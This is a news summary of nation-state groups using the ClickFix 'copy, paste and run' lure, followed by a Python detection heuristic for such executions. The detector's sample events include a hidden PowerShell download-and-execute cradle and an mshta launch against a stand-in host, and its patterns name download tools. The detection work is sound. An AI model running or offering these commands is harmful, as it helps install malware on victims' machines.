State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns
Briefly

From late 2024 through early 2025, several nation-state hacking groups, including actors from Iran, North Korea, and Russia, used the ClickFix social engineering tactic to deploy malware. This approach was primarily seen in campaigns attributed to the clusters TA427, TA450, and TA422, employing a tactic traditionally associated with cybercrime. Though ClickFix has roots in cybercrime, its increasing effectiveness has led to widespread adoption among state-sponsored actors. Proofpoint reported on the method's deployment, noting that it replaces existing stages in malware infection chains rather than transforming them significantly.
ClickFix is not revolutionizing the campaigns carried out by TA427, TA450, UNK_RemoteRogue, and TA422 but instead is replacing the installation and execution stages in existing infection chains.
TA427 made initial contact with the target through a meeting request from a spoofed sender delivered to traditional TA427 targets working on North Korean affairs.
The incorporation of ClickFix urges users to infect their own machine by following a series of instructions to copy, paste, and run malicious commands.
Proofpoint detected Kimsuky using ClickFix as part of a phishing campaign that targeted individuals in the think tank sector.
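Because ClickFix relies on the victim pasting and running a command themselves, the shell process ends up being launched directly from the user's desktop session (the Run dialog or a terminal) rather than from a document or browser. The following is an added detection example, not code from the page or from Proofpoint; it assumes process-creation events in a simple dictionary form modelled loosely on Sysmon Event ID 1 (Image, ParentImage, CommandLine) and uses constructed sample events, not real telemetry.

```python
"""Heuristic detection for ClickFix-style "copy, paste and run" executions.

Added example (not from the page or Proofpoint). Assumption: process-creation
events arrive as dicts with Image, ParentImage and CommandLine, as in Sysmon
Event ID 1. The signal used here is a shell or script host spawned directly by
explorer.exe, combined with command-line features typical of paste-and-run
lures (download cradle, hidden window, execution-policy bypass, URL).
"""
import re

# Constructed sample events for demonstration; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"iwr http://example.invalid/x | iex\""},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://example.invalid/verify"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Scheduler\sched.exe",   # hypothetical scheduler
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},
]

# Interpreters commonly abused as the "run this" step of a ClickFix lure.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line features that raise the score; each pattern counts at most once.
SUSPICIOUS = [
    re.compile(r"\b(iwr|invoke-webrequest|invoke-expression|iex|curl|bitsadmin|certutil)\b", re.I),
    re.compile(r"-(w|windowstyle)\s+hidden", re.I),
    re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
    re.compile(r"https?://", re.I),
]


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons an event looks like a paste-and-run execution.

    An empty list means the parent/child pairing does not fit the pattern at all.
    """
    reasons = []
    if basename(ev["Image"]) in SHELLS and basename(ev["ParentImage"]) == "explorer.exe":
        reasons.append("shell spawned directly from explorer.exe (Run dialog / manual paste)")
    else:
        return reasons
    for pat in SUSPICIOUS:
        if pat.search(ev["CommandLine"]):
            reasons.append(f"command line matches {pat.pattern}")
    return reasons


def find_clickfix_candidates(events, min_reasons=2):
    """Return (event, reasons) pairs scoring at least min_reasons.

    The threshold keeps a benign `cmd /c dir` typed into Run from alerting on
    the parent/child pairing alone.
    """
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev, reasons))
    return hits


if __name__ == "__main__":
    for ev, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(ev["CommandLine"])
        for r in reasons:
            print("   -", r)
```

On the constructed sample, the PowerShell download cradle and the `mshta` launch are flagged, the scheduler-spawned backup script is ignored because its parent is not explorer.exe, and the lone `cmd /c dir` falls below the threshold. In production the parent-process check should be widened to whatever launches the Run dialog or terminal in your environment (for example Windows Terminal hosting PowerShell), and the threshold tuned against a baseline of legitimate interactive shell use.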
Read at The Hacker News